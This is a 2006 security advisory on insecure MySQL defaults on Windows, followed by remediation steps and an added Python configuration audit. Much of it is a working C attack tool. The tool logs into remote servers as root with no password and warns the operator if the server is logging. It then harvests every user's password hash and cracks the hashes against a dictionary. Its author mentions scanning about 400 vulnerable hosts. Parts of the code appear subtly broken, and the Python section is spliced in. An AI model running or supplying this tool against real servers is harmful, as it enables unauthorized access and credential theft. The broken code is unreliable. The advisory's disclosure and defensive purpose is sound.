Multiple Vulnerabilities in the Default Configuration of MySQL on Windows

Source: Internet users  2006-12-16 16:51:04

Affected systems:

MySQL AB MySQL 3.23.9

MySQL AB MySQL 3.23.8

MySQL AB MySQL 3.23.52

MySQL AB MySQL 3.23.51

MySQL AB MySQL 3.23.50

MySQL AB MySQL 3.23.5

MySQL AB MySQL 3.23.49

MySQL AB MySQL 3.23.48

MySQL AB MySQL 3.23.47

MySQL AB MySQL 3.23.46

MySQL AB MySQL 3.23.45

MySQL AB MySQL 3.23.44

MySQL AB MySQL 3.23.43

MySQL AB MySQL 3.23.42

MySQL AB MySQL 3.23.41

MySQL AB MySQL 3.23.40

MySQL AB MySQL 3.23.4

MySQL AB MySQL 3.23.39

MySQL AB MySQL 3.23.38

MySQL AB MySQL 3.23.37

MySQL AB MySQL 3.23.36

MySQL AB MySQL 3.23.34

MySQL AB MySQL 3.23.31

MySQL AB MySQL 3.23.30

MySQL AB MySQL 3.23.3

MySQL AB MySQL 3.23.29

MySQL AB MySQL 3.23.28 gamma

MySQL AB MySQL 3.23.28

MySQL AB MySQL 3.23.27

MySQL AB MySQL 3.23.26

MySQL AB MySQL 3.23.25

MySQL AB MySQL 3.23.24

MySQL AB MySQL 3.23.23

MySQL AB MySQL 3.23.2

MySQL AB MySQL 3.23.10

MySQL AB MySQL 3.22.32

MySQL AB MySQL 3.22.30

MySQL AB MySQL 3.22.29

MySQL AB MySQL 3.22.28

MySQL AB MySQL 3.22.27

MySQL AB MySQL 3.22.26

- Microsoft Windows NT 4.0

- Microsoft Windows 98

- Microsoft Windows 2000

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 5513

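MySQL is an open-source relational database system that runs on many operating systems, including Microsoft Windows.

The default MySQL configuration has several problems. A remote attacker can exploit these vulnerabilities to access the database and change database operations, or to attack without being logged.

The default MySQL configuration on Windows has 3 problems:

1) Empty default ROOT password:

MySQL manages users through the internal system table 'mysql.user', which holds each user's user name, password and host fields. By default MySQL sets no password for the ROOT account, so an attacker can log in with this account without a password.

2) Binding to non-loopback addresses:

Most MySQL users install and run the database on the same host as the web server. In the MySQL configuration file the line 'bind-address=127.0.0.1' is commented out. If the server were bound to the loopback address, only the host running the database could access it; because the line is commented out, MySQL allows any user to log in from any host. Combined with the empty ROOT password, this gives access to the database with ROOT privileges.

The two problems above show up as follows:

The user table of a default MySQL installation on Windows looks like this: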

mysql> select Host,User,Password,Select_priv,Grant_priv from user;
+-----------+------+----------+-------------+------------+
| Host      | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root |          | Y           | Y          |
| %         | root |          | Y           | Y          |
| localhost |      |          | Y           | Y          |
| %         |      |          | N           | N          |
+-----------+------+----------+-------------+------------+

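The ROOT password is empty and the host field is '%', which means connections are allowed from all hosts. MySQL on Windows therefore allows login as ROOT from any host without a password.

3) No logging:

Logging is an essential part of any software. By default MySQL on Windows does no logging, which means an administrator cannot detect whether the database has been compromised, and brute-force account guessing by an attacker is not recorded either.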

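<*Source: Mike Bommarito (g0thm0g@attbi.com)

Link: http://marc.theaimsgroup.com/?l=bugtraq&m=102978779419465&w=2

*>

Test method:

--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

Mike Bommarito (g0thm0g@attbi.com) provided the following test program: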

//mysqlfuck.c

/*--||MySQLfuck||--*/

/*Written by g0thm0g*/

/*-----------------*/

/*Earlier this summer (at least where I live), I had a

conversation with a friend.

It was one of those afternoons where you get an idea,

and it kinda sticks with you.

Anyway, our conversation involved a couple questions

about INSERT's into a MySQL

database. Eventually, I told him that I would do it

for him. I came over, sat down

on his computer, and accidentally typed his full IP

address in. TO my surprise, the

host still connected. Even worse, root login wasn't

passworded. I figured that he

had mysql bound to 127.0.0.1, and that no real remote

host could connect. However,

later that night after I had gone home, I got a phone

call from the friend asking me

to do it again. Already on the computer (go figure

d:), I pulled up bash and

typed in his IP. Right as I was about to ask him what

his password was, I noticed

that MySQL hadn't even bothered to authenticate me. I

"used mysql" and then SELECT'ed

user,password,host FROM user. To my horror, I received:

+------+----------+-----------+

| user | password | host |

+------+----------+-----------+

| root | | localhost |

| root | | % |

| | | localhost |

| | | % |

+------+----------+-----------+

Not only was name-less login allowed, but root was

without password on localhost

and remote. Anyway, to make a long story short, I did

some research, and found that

default Windows MySQL configuration lacks logging or

authentication. I did some

network scanning, and I think I have around 400 hosts

with no root password. Anyway,

to automate checking this, I wrote this program up. It

tries to login as root/NULL,

then takes the values of the user password hashes and

tries to find a match to a

dictionary file called dictionary.txt.

I wrote up an advisory, which you'll probably see on

SecFoc soon.

If I had some cookies, I'd give them to:

-Tiefer and his relentless questioning and jokes about

my sister

-Club 21, especially for Hard Attack

-DJ Doboy, can't forget trancequility volume 19

(INSERT STANDARD "NOT-TO-BE-USED-FOR-ILLEGAL-USE"

CLAUSE HERE)

(INSERT STANDARD "I-HOLD-NO-LIABILITY" CLAUSE HERE)

Compile:

-MSVC= cl mysqlfuck.c libmySQL.lib /DWIN32 -O2

-GCC= gcc -omysqlfuck mysqlfuck.c -lmySQL -O2

-Cheers

g0th

*/

#include <stdio.h>

#ifdef WIN32

#include <windows.h>

#endif

#include <mysql.h>

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*Crazy MySQL programmers and their short typedefs*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

#ifndef ulong

#define ulong unsigned long

#endif

#ifndef uint

#define uint unsigned int

#endif

#ifndef uchar

#define uchar unsigned char

#endif

/*_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*?

/*##--####--####--####--####--####--####--####--##*/

/*-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-*/

/*--------------------------------------------------------------*/

/*<<<<This section is ripped straight from the MySQL

source.>>>>*/

/*I have this all nice and optimized in assembly on my

end, but*/

/*writing cross-compiler inline is not too fun, and

requiring an*/

/*assembler is kinda frustrating.*/

/*--------------------------------------------------------------*/

void hash_password(ulong *result, const char *password)

{

register ulong nr=1345345333L, add=7, nr2=0x12345671L;

ulong tmp;

for (; *password ; password++)

{

if (*password == ' ' || *password == '\t')

continue; /* skip space in password */

tmp= (ulong) (uchar) *password;

nr^= (((nr & 63)+add)*tmp)+ (nr << 8);

nr2+=(nr2 << 8) ^ nr;

add+=tmp;

}

result[0]=nr & 2147483647; /* Don't use sign bit

(str2int) */;

result[1]=nr2 & 2147483647;

return;

}

void make_scrambled_password(char *to,const char *password)

{

ulong hash_res[2];

hash_password(hash_res,password);

sprintf(to,"0000000000000000",hash_res[0],hash_res[1]);

}

/*--------------------------------------------------------------*/

/*<<<<######################################################>>>>*/

/*--------------------------------------------------------------*/

/*%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%*/

/*--------------------------------*/

/*<<<user struct to store data>>>>*/

/*--------------------------------*/

typedef struct

{

char *user;

char *password;

} user;

#define MAX_USERS 16

/*--------------------------------*/

/*<<<<########################>>>>*/

/*--------------------------------*/

//main - for "coherency's" (yes, i mean laziness) sake,

i've kept this a single function

int

main

(

int argc,

char** argv

)

{

MYSQL * mysqlData; //--|-

MYSQL_RES * mysqlResult; //--|-MySQL Datatypes

MYSQL_ROW mysqlRow; //--|-

char *spHost; //--|

char *spUser="root"; //--|

char *spPassword=NULL; //--|-Our connection data

int spPort=3306; //--|

char *spServerVersion; //--|

int usernum=0; //--|

user *users[MAX_USERS]; //--|-User name/hash storage

data

FILE *fin, *fout; //--|

char *file_name; //--|-File I/O data

char *line=(char *)malloc(64); //--|

char *buff=(char *)malloc(64); //--|-Miscellaneous

buffers

int i=0; //--|Counter

//Warn about not meeting minimal arguments

if (2>argc)

{

fprintf (stderr, "usage: mysqlfuck host [-p<port>]");

return -1;

}

//Copy the first argument into the host buffer

spHost=(char *)malloc(sizeof(argv[1]));

strcpy (spHost, argv[1]);

//Copy port if the user specified

if (argv[2])

{

if (argv[2][1]=='p')

{

++argv[2];

++argv[2];

spPort=atoi(argv[2]);

printf ("port: %i\n", spPort);

}

}

//Initialize MySQL data and connect with root/NULL

mysqlData = (MYSQL *)malloc(sizeof(MYSQL));

mysql_init (mysqlData);

if (! mysql_real_connect (mysqlData, spHost, spUser,

spPassword, "mysql", spPort, NULL, 0) )

{

fprintf (stderr, "mysql_real_connect: %s\n",

mysql_error (mysqlData));

return -1;

}

//If the server logs, inform the user!

printf ("server version: %s\n",

mysql_get_server_info(mysqlData));

if (strstr (mysql_get_server_info (mysqlData), "log"))

{

printf ("Warning! Server is logging - Continue(*/n)?");

if (getchar()=='n')

{

mysql_close (mysqlData);

return -1;

}

}

//"Obtain" the hashes (notice i didn't use the word

steal)

if ( mysql_query (mysqlData, "SELECT user,password

FROM user") )

{

fprintf (stderr, "mysql_query: %s\n", mysql_error

(mysqlData));

return -1;

}

//Store the result and process it

mysqlResult=mysql_store_result(mysqlData);

while (mysqlRow=mysql_fetch_row(mysqlResult))

{

if (strlen(mysqlRow[0])==0)

{

mysqlRow[0]="(NULL)";

}

if (strlen(mysqlRow[1])==0)

{

mysqlRow[1]="(NULL)";

}

users[usernum]=(user *)malloc(sizeof(user));

users[usernum]->user=(char

*)malloc(strlen(mysqlRow[0])+1);

strcpy (users[usernum]->user, mysqlRow[0]);

users[usernum]->password=(char

*)malloc(strlen(mysqlRow[1])+1);

strcpy (users[usernum]->password, mysqlRow[1]);

usernum++;

}

mysql_close (mysqlData);

//Setup output file name string

file_name=(char *)malloc (sizeof(spHost)+4);

strcpy (file_name, spHost);

strcat (file_name, ".txt\0\0");

printf ("\n+----------------------------+\n");

printf ("<decrypting and dumping to %s>\n", file_name);

printf ("+----------------------------+\n");

fout=fopen (spHost, "w");

if (!fout)

{

fprintf (stderr, "Unable to open %s for password

dumping\n", spHost);

return -1;

}

//Use a database to crack the hashes (optional)

fin=fopen ("dictionary.txt", "r");

if (!fin)

{

fprintf (stderr, "error opening dictionary.txt - no

decryption will take place\n");

for (i=0;i<usernum;i++)

{

printf ("%s::%s\n", users[i]->user,

users[i]->password);

}

return -1;

}

//Loop through the user array and crack/output hashes

for (i=0;i<usernum;i++)

{

if (users[i]->user)

{

if (users[i]->password)

{

while ( (fgets (line, 63, fin)))

{

line[strlen(line)-1]='\0';

make_scrambled_password (buff, line);

if (strcmp (buff, users[i]->password)==0)

{

users[i]->password=line;

break;

}

}

fclose (fin);

fprintf (fout, "%s::%s\n", users[i]->user,

users[i]->password);

printf ("%s::%s\n", users[i]->user,

users[i]->password);

fflush (fout);

}

}

}

//Always clean up after yourself!

fclose (fout);

if (buff)

free (buff);

if (line)

free (line);

if (spHost)

free (spHost);

if (users)

free (users);

if (file_name)

free (file_name);

if (mysqlData)

free (mysqlData);

}

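Recommendations:

--------------------------------------------------------------------------------

Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* 1) Set a password for root

mysql> set password for root@localhost=password('password');

* 2) Delete the anonymous users and the records whose Host field is % from the User table

mysql> delete from user where user='';

mysql> delete from user where host='%';

mysql> flush privileges;

* 3) Remove the comment marker from the 'bind-address=127.0.0.1' line in the configuration file, then restart MySQL.

* 4) Add the following to my.ini:

log-long-format

log=/path/to/somewhere/log.txt

Then restart MySQL.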
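An added example (not part of the original advisory and not MySQL code): a Python audit that applies the four checks above to the client output of the user-table query and to the text of my.ini. The sample table and my.ini are constructed from the defaults the advisory describes, and the function names are illustrative.

```python
import re

# Constructed sample: the default Windows user table quoted in the advisory.
SAMPLE_USER_TABLE = """\
+-----------+------+----------+-------------+------------+
| Host      | User | Password | Select_priv | Grant_priv |
+-----------+------+----------+-------------+------------+
| localhost | root |          | Y           | Y          |
| %         | root |          | Y           | Y          |
| localhost |      |          | Y           | Y          |
| %         |      |          | N           | N          |
+-----------+------+----------+-------------+------------+
"""

# Constructed sample my.ini: bind-address still commented out, no log option.
SAMPLE_MY_INI = """\
[mysqld]
basedir=C:/mysql
#bind-address=127.0.0.1
"""


def parse_table(text):
    """Turn mysql client ASCII-table output into a list of row dicts."""
    rows = [[cell.strip() for cell in line.strip().strip("|").split("|")]
            for line in text.splitlines() if line.strip().startswith("|")]
    if not rows:
        return []
    header = [name.lower() for name in rows[0]]
    return [dict(zip(header, row)) for row in rows[1:]]


def audit_users(rows):
    """Flag the account problems from steps 1 and 2 of the workaround."""
    findings = []
    for row in rows:
        who = "%s@%s" % (row["user"] or "(anonymous)", row["host"])
        if row["password"] == "":
            findings.append((who, "empty password"))
        if row["user"] == "":
            findings.append((who, "anonymous account"))
        if row["host"] == "%":
            findings.append((who, "connects from any host"))
    return findings


def audit_config(ini_text):
    """Check [mysqld] for loopback binding (step 3) and logging (step 4)."""
    opts, section = {}, None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank line or commented-out option
        match = re.match(r"\[(.+)\]$", line)
        if match:
            section = match.group(1).lower()
        elif section == "mysqld":
            key, _, value = line.partition("=")
            opts[key.strip().lower().replace("_", "-")] = value.strip()
    findings = []
    if opts.get("bind-address") != "127.0.0.1":
        findings.append("bind-address is not 127.0.0.1")
    if "log" not in opts:
        findings.append("no query log configured")
    return findings


if __name__ == "__main__":
    for who, problem in audit_users(parse_table(SAMPLE_USER_TABLE)):
        print("%-24s %s" % (who, problem))
    for problem in audit_config(SAMPLE_MY_INI):
        print("my.ini: " + problem)
```
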

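Vendor patch:

MySQL AB

--------

The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: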

http://www.mysql.com/

 